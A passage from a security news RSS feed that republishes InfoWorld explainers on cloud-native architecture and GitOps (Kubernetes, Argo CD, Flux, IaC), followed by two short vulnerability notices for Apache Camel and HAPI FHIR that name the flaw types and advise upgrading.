<p class="wp-block-paragraph"><strong>Open standards and APIs. </strong>The fact that containers and cloud platforms are largely defined by open standards and <a href="https://www.infoworld.com/article/3800992/open-source-trends-for-2025-and-beyond.html">open source technologies</a> is the secret sauce that makes all this modularity and orchestration possible, and <a href="https://www.infoworld.com/article/3529600/how-do-you-govern-a-sprawling-disparate-api-portfolio.html">standardized and documented APIs </a>offer the means of communication between distributed components of a larger application. In theory, anyway, this standardization means that every component should be able to communicate with other components of an application without knowing about their inner workings, or about the inner workings of the various platform layers on which everything operates.</p>



<p class="wp-block-paragraph"><strong>DevOps, agile methodologies, and infrastructure as code. </strong>Because cloud-native applications exist as a series of small, discrete units of functionality, cloud-native teams can build and update them using agile philosophies like <a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">DevOps</a>, which promotes <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">rapid, iterative CI/CD development</a>. This enables teams to deliver business value more quickly and more reliably.</p>



<p class="wp-block-paragraph">The virtualized nature of cloud environments also make them great candidates for <a href="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html">infrastructure as code</a> (IaC), a practice in which teams use tools like <a href="https://developer.hashicorp.com/terraform/intro">Terraform</a>, <a href="https://www.pulumi.com/">Pulumi</a>, and <a href="https://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/Welcome.html">AWS CloudFormation</a>, to manage infrastructure declaratively and version those declarations just like application code. IaC boosts automation, repeatability, and resilience across environments—all big advantages in the cloud world. IaC also goes hand-in-hand with the concept of <em>immutable infrastructure</em>—the idea that, once deployed, infastructure-level entities like virtual machines, containers, or network appliances don’t change, which makes them easier to manage and secure. IaC stores declarative configuration code in version control, which creates an audit log of any changes.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/04/5_things_cloud_native.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Chart listing five things to love and five things to fear when considiering cloud native" class="wp-image-3970036" width="1024" height="472" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>There’s a lot to love about cloud-native architectures, but there are also several things to be wary of when considering it.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading"><strong>How the cloud-native stack is expanding</strong></h2>



<p class="wp-block-paragraph">As cloud-native development becomes the norm, the cloud-native ecosystem is expanding; the CNCF maintains a graphical representation of what it calls the  <a href="https://landscape.cncf.io/">cloud native landscape</a> that hammers home to expansive and bewildering variety of products, services, and open source projects that contribute to (and seek to profit from) to cloud-native computing. And there are a number of areas where new and developing tools are complicating the picture sketched out by the pillars we discussed above.   </p>



<p class="wp-block-paragraph"><strong>An expanding Kubernetes ecosystem.</strong> <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes </a>is complex, and teams now rely on an <a href="https://www.infoworld.com/article/2265338/13-tools-that-make-kubernetes-better.html">entire ecosystem of projects </a>to get the most out of it: <a href="https://www.infoworld.com/article/2264445/helm-3-package-manager-arrives-for-kubernetes.html">Helm</a> for packaging, <a href="https://argo-cd.readthedocs.io/en/stable/">ArgoCD </a>for GitOps-style deployments, and <a href="https://kustomize.io/">Kustomize </a>for configuration management. And just as Kubernetes augmented Docker for enterprise-scale deployments. Kubernetes itself has been augmented and expanded by <a href="https://www.infoworld.com/article/2261159/what-is-a-service-mesh-easier-container-networking.html">service mesh</a> offerings like <a href="https://istio.io/">Istio </a>and <a href="https://linkerd.io/">Linkerd</a><strong>, </strong>which offer fine-grained traffic control and improved security</p>



<p class="wp-block-paragraph"><strong>Observability needs. </strong>The complex and distributed world of cloud-native computing requires in-depth <a href="https://www.infoworld.com/article/2262666/what-is-observability-software-monitoring-on-steroids.html">observability</a> to ensure that developers and admins have a handle on what’s happening with their applications. <a href="https://www.infoworld.com/article/2337343/what-observability-means-for-cloud-operations.html">Cloud-native observability</a> uses distributed tracing and aggregated logs to provide deep insight into performance and reliability. Tools like <a href="https://www.infoworld.com/article/2246709/prometheus-unbound-open-source-cloud-monitoring.html">Prometheus</a>, <a href="https://www.infoworld.com/article/2337267/grafana-shining-a-light-into-kubernetes-clusters.html">Grafana</a>, <a href="https://www.cncf.io/projects/jaeger/">Jaeger</a>, and <a href="https://opentelemetry.io/">OpenTelemetry</a> support comprehensive, real-time observability across the stack.</p>



<p class="wp-block-paragraph"><strong>Serverless computing.  </strong><a href="https://www.infoworld.com/article/2261831/what-is-serverless-serverless-computing-explained.html">Serverless computing</a>, particularly in its function-as-a-service guise, offers to strip needed compute resources down to their bare minimum, with functions running on service provider clouds using exactly as much as they need and no more. Because these services can be exposed as endpoints via APIs, they are increasingly integrated into distributed applications, operating side-by-side with functionality provided by containerized microservices. Watch out, though: the big FaaS providers (<a href="https://www.infoworld.com/article/2265860/aws-lambda-tutorial-get-started-with-serverless-computing.html">Amazon</a>, <a href="https://www.infoworld.com/article/2255377/how-to-work-with-azure-functions-in-csharp.html">Microsoft</a>, and <a href="https://www.infoworld.com/article/2243861/google-takes-aims-at-aws-lambda-with-cloud-functions.html">Google</a>) would love to lock you in to their ecosystems.  </p>



<p class="wp-block-paragraph"><strong>FinOps. </strong><a href="http://infoworld.com/article/2238873/what-is-cloud-computing.html">Cloud computing</a> was initially billed as a way to cut costs — no need to pay for an in-house data center that you barely use — but in practice it replaces capex with opex, and sometimes you can run up truly shocking cloud service bills if you aren’t careful. Serverless computing is one way to cut down on those costs, but financial operations, or <a href="https://www.cio.com/article/416337/what-is-finops-your-guide-to-cloud-cost-management.html">FinOps</a>, is a more systematic discipline that aims to aligns engineering, finance, and product to optimize cloud spending. <a href="https://www.infoworld.com/article/2338592/6-finops-best-practices-to-reduce-cloud-costs.html">FinOps best practices</a> make use of those observability tools to best determine what departments and applications are eating up resources.</p>



<h2 class="wp-block-heading"><strong>How cloud-native architecture is adapting to AI workloads</strong></h2>



<p class="wp-block-paragraph">Enterprises deploy larger AI models and make use of more and more real-time inference services. That’s putting demands on cloud-native systems and forcing them to adapt to remain scalable and reliable.</p>



<p class="wp-block-paragraph">For instance, organizations are <a href="https://www.infoworld.com/article/4057189/the-rise-of-ai-ready-private-clouds.html">re-engineering cloud environments</a> around GPU-accelerated clusters, low-latency networking, and predictable orchestration. These needs align with established cloud-native patterns: containers package AI services consistently, while Kubernetes provides resilient scheduling and horizontal scale for inference workloads that can spike without warning.</p>



<p class="wp-block-paragraph">Kubernetes itself is <a href="https://www.infoworld.com/article/4045563/evolving-kubernetes-for-generative-ai-inference.html">changing to better support AI inference</a>, adding hardware-aware scheduling for GPUs, model-specific autoscaling behavior, and deeper observability into inference pipelines. These enhancements make Kubernetes a more natural platform for serving generative AI workloads.</p>



<p class="wp-block-paragraph">AI’s resource demands are amplifying traditional cloud-native challenges. Observability becomes more complex as inference paths span GPUs, CPUs, vector databases, and distributed storage. <a href="https://www.cio.com/article/416337/what-is-finops-your-guide-to-cloud-cost-management.html">FinOps</a> teams contend with cost volatility from training and inference bursts. And security teams must track new risks around model provenance, data access, and supply-chain integrity.</p>



<h2 class="wp-block-heading"><strong>Application frameworks for building distributed cloud-native apps</strong></h2>



<p class="wp-block-paragraph">Microsoft’s Aspire is one of the most visible examples of a shift towards application frameworks to simplify how teams build distributed systems. Opinionated frameworks like Aspire provide structure, observability, and integration out of the box so developer don’t need to stitch together containers, microservices, and orchestration tooling by hand.</p>



<p class="wp-block-paragraph">Aspire in particular is a <a href="https://www.infoworld.com/article/4023638/taking-net-aspire-for-a-spin.html">prescriptive framework for cloud-native applications</a>, bundling containerized services, environment configuration, health checks, and observability into a unified development model. Aspire provides defaults for service-to-service communication, configuration, and deployment, along with a built-in dashboard for visibility across distributed components.</p>



<p class="wp-block-paragraph">While Aspire was originally aligned with Microsoft’s .<a href="https://www.infoworld.com/article/2264488/what-is-the-net-framework-microsofts-answer-to-java.html">NET platform</a>,Redmond now sees it as having a<strong>  </strong><a href="https://www.infoworld.com/article/4085051/aspires-polyglot-future.html?utm_source=chatgpt.com">polyglot future</a>. This positions Aspire as part of a broader trend: frameworks that help teams build cloud-native, service-oriented systems without being locked into a single language ecosystem. Several other frameworks are gaining traction: Dapr provides a portable runtime that abstracts many of the plumbing tasks in cloud-native distributed applications, and Orleans offers an actor-model-based framework for large-scale systems in the .NET world, and Akka gives JVM teams a mature, reactive toolkit for elastic, resilient services.</p>



<h2 class="wp-block-heading"><strong>Frameworks and tools in the expanding cloud-native ecosystem</strong></h2>



<p class="wp-block-paragraph">While frameworks like Aspire simplify how developers compose and structure distributed applications, most cloud-native systems still depend on a broader ecosystem of platforms and operational tooling. This deeper layer is where much of the complexity—and innovation—of cloud-native computing lives, particularly as Kubernetes continues to serve as the industry’s control plane for modern infrastructure.</p>



<p class="wp-block-paragraph">Kubernetes provides the core abstractions for deploying and orchestrating containerized workloads at scale. Managed distributions such as Google Kubernetes Engine (GKE), Amazon EKS, <a href="https://www.infoworld.com/article/4058764/smoother-kubernetes-sailing-with-aks-automatic.html">Azure AKS</a>, and Red Hat OpenShift build on these primitives with security, lifecycle automation, and enterprise support. Platform vendors are increasingly automating cluster operations—upgrades, scaling, remediation—to reduce the operational burden on engineering teams.</p>



<p class="wp-block-paragraph">Surrounding Kubernetes is a rapidly expanding ecosystem of complementary frameworks and tools. <a href="https://www.infoworld.com/article/2261159/what-is-a-service-mesh-easier-container-networking.html">Service meshes</a> like Istio and Linkerd provide fine-grained traffic management, policy enforcement, and mTLS-based security across microservices. <a href="https://www.infoworld.com/article/2259088/what-is-gitops-extending-devops-to-kubernetes-and-beyond.html">GitOps</a> platforms such as Argo CD and Flux bring declarative, version-controlled deployments to cloud-native environments. Meanwhile, projects like Crossplane turn Kubernetes into a universal control plane for cloud infrastructure, letting teams provision databases, queues, and storage through familiar Kubernetes APIs. These tools illustrate how cloud-native development now spans multiple layers: developer-focused application frameworks like Aspire at the top, and a powerful, evolving Kubernetes ecosystem underneath that keeps modern distributed applications running.</p>



<h2 class="wp-block-heading"><strong>Advantages and challenges for cloud-native development</strong></h2>



<p class="wp-block-paragraph">Cloud native has become so ubiquitous that its advantages are almost taken for granted at this point, but it’s worth reflecting on the beneficial shift the cloud native paradigm represents. Huge, monolithic codebases that saw updates rolled out once every couple of years have been replaced by microservice-based applications that can be improved continuously. Cloud-based deployments, when managed correctly, make better use of compute resources and allow companies to offer their products as SaaS or PaaS services. </p>



<p class="wp-block-paragraph">But <a href="https://www.infoworld.com/article/2337882/the-downsides-of-cloud-native-solutions.html">cloud-native deployments come with a number of challenges</a>, too:</p>



<ul class="wp-block-list">
<li><strong>Complexity and operational overhead: </strong>You’ll have noticed by now that many of the cloud-native tools we’ve discussed, like service meshes and observability tools, are needed to deal with the complexity of cloud-native applications and environments. Individual microservices are deceptively simple, but coordinating them all in a distributed environment is a big lift.</li>



<li><strong>Security: </strong>More services executing on more machines, communicating by open APIs, all adds up to a bigger attack surface for hackers. <a href="https://www.csoonline.com/article/572501/managing-container-vulnerability-risks-tools-and-best-practices.html">Containers</a> and <a href="https://www.csoonline.com/article/3618243/securing-cloud-native-applications-why-a-comprehensive-api-security-strategy-is-essential.html">APIs</a> each have their own special security needs, and a <a href="https://www.infoworld.com/article/2259477/open-policy-agent-a-general-purpose-policy-engine-for-cloud-native.html">policy engine</a> can be an important tool for imposing a security baseline on a sprawling cloud-native app. <a href="https://www.csoonline.com/article/564095/what-is-devsecops-developing-more-secure-applications.html">DevSecOps</a>, which adds security to DevOps, has become an important cloud-native development practice to try to close these gaps.</li>



<li><strong>Vendor lock-in: </strong>This may come as a surprise, since cloud-native is based on open standards and open source. But there are differences in how the big cloud and serverless providers works, and once you’ve written code with one provider in mind, <a href="https://www.infoworld.com/article/2337012/get-used-to-cloud-vendor-lock-in.html">it can be hard to migrate elsewhere</a>.</li>



<li><strong>A persistent skills gap: </strong>Cloud-native computing and development may have years under its belt at this point, but the number of developers who are truly skilled in this arena is a smaller portion of the workforce than you’d think. Companies <a href="https://www.infoworld.com/article/3484912/a-strategic-road-map-for-navigating-the-cloud-skills-shortage.html">face difficult choices in bridging this skills gap</a>, whether that’s bidding up salaries, working to upskill current workers, or allowing remote work so they can cast a wide net. </li>
</ul>



<h2 class="wp-block-heading">Cloud native in the real world</h2>



<p class="wp-block-paragraph">Cloud native computing is often associated with giants like Netflix, Spotify, Uber, and AirBNB, where many of its technologies were pioneered in the early ’10s. But the CNCF’s <a href="https://www.cncf.io/case-studies/">Case Studies page</a> provides an in-depth look at how cloud native technologies are helping companies. Examples include the following:</p>



<ul class="wp-block-list">
<li>A UK-based payment technology company that can <a href="https://www.cncf.io/case-studies/form3/">switch between data centers and clouds</a> with zero downtime</li>



<li>A software company whose product collects and analyzes data from IoT devices — and can <a href="https://www.cncf.io/case-studies/tempestive/">scale up</a> as the number of gadgets grows</li>



<li>A Czech web service company that managed to <a href="https://www.cncf.io/case-studies/seznam/">improve performance while reducing costs</a> by migrating to the cloud</li>
</ul>



<p class="wp-block-paragraph">Cloud-native infrastructure’s capability to quickly scale up to large workloads also make it an attractive platform for developing AI/ML applications: another one of those CNCF case studies looks at how IBM uses Kubernetes to <a href="https://www.cncf.io/case-studies/ibmwatsonxassistant/">train its Watsonx assistant</a>. The big three providers are putting a lot of effort into pitching their platforms as the place for you to develop your own generative AI tools, with offerings like <a href="https://www.infoworld.com/article/3608598/microsoft-rebrands-azure-ai-studio-to-azure-ai-foundry.html">Azure AI Foundry,</a><a href="https://www.infoworld.com/article/3959648/google-unveils-firebase-studio-for-ai-app-development.html">Google Firebase Studio</a>, and <a href="https://www.infoworld.com/article/2336139/amazon-bedrock-a-solid-generative-ai-foundation.html">Amazon Bedrock</a>. It seems clear that cloud native technology is ready for what comes next.</p>



<h2 class="wp-block-heading">Learn more about related cloud-native technologies:</h2>



<ul class="wp-block-list">
<li><a href="https://www.infoworld.com/article/2256066/what-is-paas-platform-as-a-service-a-simpler-way-to-build-software-applications.html">Platform-as-a-service (PaaS) explained</a></li>



<li><a href="https://www.infoworld.com/article/2238873/what-is-cloud-computing.html">What is cloud computing</a></li>



<li><a href="https://www.infoworld.com/article/2256706/what-is-multicloud-the-next-step-in-cloud-computing.html">Multicloud explained</a></li>



<li><a href="https://www.infoworld.com/article/2259475/what-is-agile-methodology-modern-software-development-explained.html">Agile methodology explained</a></li>



<li><a href="https://www.infoworld.com/article/2259487/how-to-excel-in-agile-software-development.html">Agile development best practices</a></li>



<li><a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">Devops explained</a></li>



<li><a href="https://www.infoworld.com/article/2266905/devops-best-practices-the-5-methods-you-should-adopt.html">Devops best practices</a></li>



<li><a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">Microservices explained</a></li>



<li><a href="https://www.infoworld.com/article/2253197/tutorial-how-to-build-microservices-apps.html">Microservices tutorial</a></li>



<li><a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker and Linux containers explained</a></li>



<li><a href="https://www.infoworld.com/article/2254159/how-to-get-started-with-kubernetes-2.html">Kubernetes tutorial</a></li>



<li><a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">CI/CD (continuous integration and continuous delivery) explained</a></li>



<li><a href="https://www.infoworld.com/article/2268012/get-started-with-cicd-automating-application-delivery-with-cicd-pipelines.html">CI/CD best practices</a></li>
</ul>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What is GitOps? Extending devops to Kubernetes and beyond]]></title>
<description><![CDATA[Over the past decade, software development has been shaped by two closely related transformations. One is the rise of devops and continuous integration and continuous delivery (CI/CD), which brought development and operations teams together around automated, incremental software delivery.



The ...]]></description>
<link>https://tsecurity.de/de/3665667/ai-nachrichten/what-is-gitops-extending-devops-to-kubernetes-and-beyond/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665667/ai-nachrichten/what-is-gitops-extending-devops-to-kubernetes-and-beyond/</guid>
<pubDate>Mon, 13 Jul 2026 17:04:29 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Over the past decade, software development has been shaped by two closely related transformations. One is the rise of <a href="https://www.infoworld.com/article/2255028/what-is-devops-bringing-dev-and-ops-together-for-better-software.html">devops</a> and <a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">continuous integration and continuous delivery</a> (CI/CD), which brought development and operations teams together around automated, incremental software delivery.</p>



<p class="wp-block-paragraph">The other is the shift from monolithic applications to distributed, cloud-native systems built from microservices and containers, typically managed by orchestration platforms such as <a href="https://www.infoworld.com/article/2266945/what-is-kubernetes-scalable-cloud-native-applications.html">Kubernetes</a>.</p>



<p class="wp-block-paragraph">While Kubernetes and similar platforms simplify many aspects of running distributed applications, operating these systems at scale is still complicated. Configuration sprawl, environment drift, and the need for rapid, reliable change all introduce operational challenges. GitOps emerged as a way to address those challenges by extending familiar devops and CI/CD techniques beyond application code and into infrastructure and system configuration.</p>



<p class="wp-block-paragraph">At the heart of GitOps is the concept of <a href="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html">infrastructure as code</a> (IaC). In a GitOps model, not only application code but also infrastructure definitions, deployment configurations, and operational settings are described in files stored in a version control system. Automated processes continuously compare the running system with those declarations and work to bring the live environment back into alignment when differences appear.</p>



<p class="wp-block-paragraph">In this approach, the version control repository serves as the system of record for how applications and their supporting infrastructure should look in production. Changes flow through the same review, approval, and automation pipelines that developers already use for software, bringing greater consistency, traceability, and repeatability to cloud-native operations.</p>



<p class="wp-block-paragraph">At a high level, GitOps refers to a set of operational practices for managing cloud-native systems using declarative configuration, version control, and automated reconciliation. Rather than treating infrastructure and application configuration as mutable runtime state, GitOps treats them as versioned artifacts that move through the same review, testing, and deployment processes as application code.</p>



<h2 class="wp-block-heading"><strong>GitOps defined</strong></h2>



<p class="wp-block-paragraph">The term GitOps was originally coined and popularized by Weaveworks, which helped formalize the approach in the context of Kubernetes operations. While that early work shaped the way GitOps was discussed and implemented, GitOps has since evolved into a broadly adopted, vendor-neutral pattern. Today, it describes a shared set of ideas rather than a specific product or platform.</p>



<p class="wp-block-paragraph">The defining characteristic of GitOps is its reliance on declarative configuration stored in a version control system. Instead of issuing imperative commands to change live systems, teams describe the desired state of applications and infrastructure in configuration files. Automated agents then continuously compare that declared state with what is actually running and work to reconcile any differences. This pull-based model—where systems converge toward the desired state defined in version control—provides built-in drift detection, repeatability, and a clear audit trail for every change.</p>



<p class="wp-block-paragraph">Because GitOps centers on configuration files stored in a version control system, familiar software development practices carry over naturally. Changes are proposed through commits, reviewed before being accepted, and tracked over time. Rollbacks are accomplished by reverting to known-good versions, and the history of how a system evolved is preserved alongside the configuration itself.</p>



<p class="wp-block-paragraph">While the use of <a href="https://www.infoworld.com/article/2334697/what-is-git-version-control-for-collaborative-programming.html">Git</a> as the version control system is not strictly required, it has become the default choice because of its ubiquity in modern devops workflows and its strong support for collaboration and change management, so its place in the name has stuck.</p>



<aside class="sidebar">
<h3><strong> GitOps vs. IaC </strong></h3>
<p>Infrastructure as code (IaC) and GitOps are closely related, but they solve different problems. </p>
<p>IaC focuses on how infrastructure is defined. Servers, networks, and services are described using declarative configuration files, which are then applied by automation tools. GitOps builds on IaC by adding an operating model around those definitions. In a GitOps workflow, the desired state of systems is stored in a version control repository and treated as the system of record. Automated agents continuously compare the running environment with that desired state and reconcile any differences.</p>
<p>The key distinction is persistence. IaC provisions infrastructure; GitOps keeps systems in the intended state over time. By using pull-based reconciliation and continuous drift detection, GitOps extends IaC into a day-to-day operational discipline.
</p>

</aside>



<h2 class="wp-block-heading"><strong>What is the CI/CD process?</strong></h2>



<p class="wp-block-paragraph">A complete look at CI/CD is beyond the scope of this article—<a href="https://www.infoworld.com/article/2269266/what-is-cicd-continuous-integration-and-continuous-delivery-explained.html">see the InfoWorld explainer on the subject</a>—but we need to say a few words about CI/CD because it’s at the core of how GitOps works. The <em>continuous integration</em> half of CI/CD is enabled by version control repositories like Git: Developers can make constant small improvements to their codebase, rather than rolling out huge, monolithic new versions every few months or years. The <em>continuous deployment</em> piece is made possible by automated systems called <em>pipelines</em> that build, test, and deploy the new code to production.</p>



<p class="wp-block-paragraph">Again, we keep talking about <em>code </em>here, and that usually summons up visions of executable code written in a programming language such as C or Java or JavaScript. But in GitOps, the “code” we’re managing is largely made up of configuration files. This isn’t just a minor detail — it’s at the heart of what GitOps does. These config files are, as we’ve said, the “single source of truth” describing what our system should look like. They are <em>declarative </em>rather than instructive. That means that instead of saying “start up ten servers,” the configuration file will simply say, “this system includes ten servers.”</p>



<p class="wp-block-paragraph"><strong>GitOps and Kubernetes</strong></p>



<p class="wp-block-paragraph">GitOps first took hold in the Kubernetes ecosystem, where declarative configuration and continuous reconciliation are core design principles. As a result, Kubernetes remains the most common and best-understood environment for applying GitOps practices. A typical GitOps-driven update process for a Kubernetes application looks like this:</p>



<ol start="1" class="wp-block-list">
<li>A developer proposes a change by committing updated application code or configuration to a version control repository, usually through a pull request.</li>



<li>That change is reviewed and approved, then merged into the main branch.</li>



<li>The merge triggers an automated CI/CD pipeline that tests the change, builds new artifacts if needed, and publishes them to a registry.</li>



<li>A GitOps controller or similar automated agent detects the updated desired state stored in version control.</li>



<li>The controller compares that desired state with the current state of the Kubernetes cluster and applies the necessary changes to bring the cluster back into alignment.</li>
</ol>



<p class="wp-block-paragraph">This pull-based reconciliation loop—where the cluster continuously converges toward the desired state defined in version control—is central to how GitOps works in practice. While Kubernetes provides a natural fit for this model, it represents just one canonical use case. The same patterns increasingly apply to infrastructure provisioning, policy enforcement, and multi-cluster operations beyond Kubernetes itself.</p>



<h2 class="wp-block-heading"><strong>GitOps tooling in practice: Argo CD, Flux, and the ecosystem</strong></h2>



<p class="wp-block-paragraph">GitOps is enabled by a set of tools that embody the principles we’ve outlined, with some open-source projects emerging as de facto standards in cloud-native environments.</p>



<p class="wp-block-paragraph">At the center of the GitOps ecosystem is Argo CD, an open-source controller that continuously monitors a version control repository and ensures that the state of running systems matches the declared desired state. Argo CD is widely used in Kubernetes environments because it directly implements pull-based reconciliation: it compares the desired state stored in Git with the cluster’s actual state and applies changes to correct any drift.</p>



<p class="wp-block-paragraph">Alongside Argo CD, Flux is another prominent open source GitOps engine. Both Flux and Argo CD help teams adopt GitOps workflows by managing the synchronization loop between code and runtime, but they differ in operational philosophy, integration surfaces, and ecosystem fit.</p>



<p class="wp-block-paragraph">GitOps tooling often appears as part of broader platforms or integrated stacks rather than as isolated utilities. For example, <a href="https://www.infoworld.com/article/4006297/top-6-multicloud-management-systems.html">multicloud and cluster management solutions</a> now routinely include GitOps support, with Argo CD or compatible controllers bundled alongside deployment, policy, and governance capabilities.</p>



<p class="wp-block-paragraph">In addition to Flux and Argo CD, a range of auxiliary tools contribute to a complete GitOps ecosystem: policy as code engines (e.g., Open Policy Agent), drift detection systems, and infrastructure provisioning tools that mesh with Git-centric workflows.</p>



<h2 class="wp-block-heading"><strong>GitOps, devops, and normalization</strong></h2>



<p class="wp-block-paragraph">GitOps grew out of the same forces that drove devops into mainstream IT practice, and in its early days, GitOps was often discussed as a distinct extension of devops, specifically tailored to managing declarative infrastructure and Kubernetes-centric systems. At the time, GitOps was still relatively new and <a href="http://infoworld.com/article/2265546/why-gitops-isnt-ready-for-the-mainstream-yet.html">not yet widely adopted outside cloud-native pioneers</a>.</p>



<p class="wp-block-paragraph">Over the last several years, however, GitOps practices have become deeply woven into how teams operate modern cloud environments. Rather than being treated as an optional add-on or marketing term, the core ideas of GitOps — using version-controlled, declarative configuration and automated reconciliation loops to continuously align running systems with intended state — are now part of standard operational practice in many Kubernetes-centric shops. In this sense, GitOps has shifted from a buzzword about what might be possible to a baseline pattern for cloud-native operations, much like devops itself did years earlier.</p>



<p class="wp-block-paragraph">In environments where Kubernetes and declarative systems are the norm, GitOps workflows are the default way teams manage and deploy change. Many organizations now implement these patterns without explicitly calling them “GitOps,” just as few teams today explicitly say they do “CI/CD” even though continuous pipelines are taken for granted. The term has become less prominent in marketing, but its practices are often embedded in pipelines, controllers, and platform tooling.</p>



<p class="wp-block-paragraph">That normalization shows up in how GitOps workflows are woven into broader operational frameworks. For example, <a href="https://www.infoworld.com/article/2338225/what-is-platform-engineering-evolving-devops.html">platform engineering</a> teams frequently build internal developer platforms that encapsulate GitOps patterns behind standardized developer APIs, making the pattern invisible to most application teams while still providing the auditability and automation that GitOps promises.</p>



<h2 class="wp-block-heading"><strong>GitOps beyond Kubernetes: infrastructure, policy, and drift</strong></h2>



<p class="wp-block-paragraph">While GitOps first gained traction as a way to manage Kubernetes deployments, its core principles apply broadly to infrastructure and operational concerns beyond any single orchestration platform. GitOps treats desired state as declarative configuration stored in version control and uses automated reconciliation to ensure running systems align with that state. That pattern naturally extends to infrastructure provisioning, policy enforcement, configuration drift detection, and governance workflows across diverse environments.</p>



<p class="wp-block-paragraph">In modern operational stacks, infrastructure is increasingly defined declaratively, whether through Kubernetes manifests, Terraform modules, or other infrastructure-as-code formats. Storing these declarations in version control enables the same peer-review, auditability, and rollback practices developers already use for application code. Automated tooling then continuously detects when the live infrastructure diverges from the declared state and works to bring it back into alignment, reducing the risk of configuration drift and inadvertent misconfigurations.</p>



<p class="wp-block-paragraph">Configuration drift — the state where an environment has diverged from what’s declared in version control — remains a major operational headache, especially in complex, dynamic systems. Drift can arise from ad hoc fixes, emergency updates, or manual changes made outside normal pipelines, and it can lead to inconsistencies, outages, and security gaps. By continually checking running systems against the desired state in Git and reconciling deviations automatically, GitOps workflows help teams keep environments predictable and auditable.</p>



<p class="wp-block-paragraph">Policy enforcement and compliance are another natural extension of GitOps patterns. As organizations adopt declarative practices, policy-as-code engines and drift detection systems can be woven into GitOps pipelines to validate that proposed configurations meet security, compliance, or operational standards before they’re ever applied to running systems. Embedding policy checks into declarative workflows brings consistency to governance while preserving the automation and speed that devops teams expect.</p>



<h2 class="wp-block-heading"><strong>GitOps – beyond Kubernetes</strong></h2>



<p class="wp-block-paragraph">GitOps began as a way to bring devops discipline to Kubernetes operations, but its longer-term impact has been more subtle. In many ways, it’s been absorbed into the fabric of modern cloud-native operations, where declarative configuration, version control, and automated reconciliation are taken for granted. Today, GitOps is less about a specific set of tools or a named practice and more about an operational mindset. By treating infrastructure and configuration as versioned, auditable artifacts and relying on automation to enforce consistency, GitOps helps teams manage complexity at scale. Even as the term itself fades from the spotlight, the practices it introduced continue to shape how distributed systems are built, deployed, and operated.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43867 | Apache Camel up to 4.18.2/4.20.x Camel-PQC java.io.ObjectInputStream deserialization (WID-SEC-2026-2203)]]></title>
<description><![CDATA[A vulnerability was found in Apache Camel up to 4.18.2/4.20.x and classified as critical. Impacted is the function java.io.ObjectInputStream of the component Camel-PQC. Executing a manipulation can lead to deserialization.

The identification of this vulnerability is CVE-2026-43867. The attack ma...]]></description>
<link>https://tsecurity.de/de/3665458/sicherheitsluecken/cve-2026-43867-apache-camel-up-to-4182420x-camel-pqc-javaioobjectinputstream-deserialization-wid-sec-2026-2203/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665458/sicherheitsluecken/cve-2026-43867-apache-camel-up-to-4182420x-camel-pqc-javaioobjectinputstream-deserialization-wid-sec-2026-2203/</guid>
<pubDate>Mon, 13 Jul 2026 15:51:53 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apache:camel">Apache Camel up to 4.18.2/4.20.x</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is the function <code>java.io.ObjectInputStream</code> of the component <em>Camel-PQC</em>. Executing a manipulation can lead to deserialization.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2026-43867">CVE-2026-43867</a>. The attack may be launched remotely. There is no exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-55471 | hapifhir HAPI FHIR up to 6.9.9 XsltUtilities XsltUtilities.java saxonTransform xml external entity reference]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in hapifhir HAPI FHIR up to 6.9.9. The affected element is the function saxonTransform of the file org/hl7/fhir/utilities/XsltUtilities.java of the component XsltUtilities. Such manipulation leads to xml external entity reference.

This ...]]></description>
<link>https://tsecurity.de/de/3664918/sicherheitsluecken/cve-2026-55471-hapifhir-hapi-fhir-up-to-699-xsltutilities-xsltutilitiesjava-saxontransform-xml-external-entity-reference/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664918/sicherheitsluecken/cve-2026-55471-hapifhir-hapi-fhir-up-to-699-xsltutilities-xsltutilitiesjava-saxontransform-xml-external-entity-reference/</guid>
<pubDate>Mon, 13 Jul 2026 12:21:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
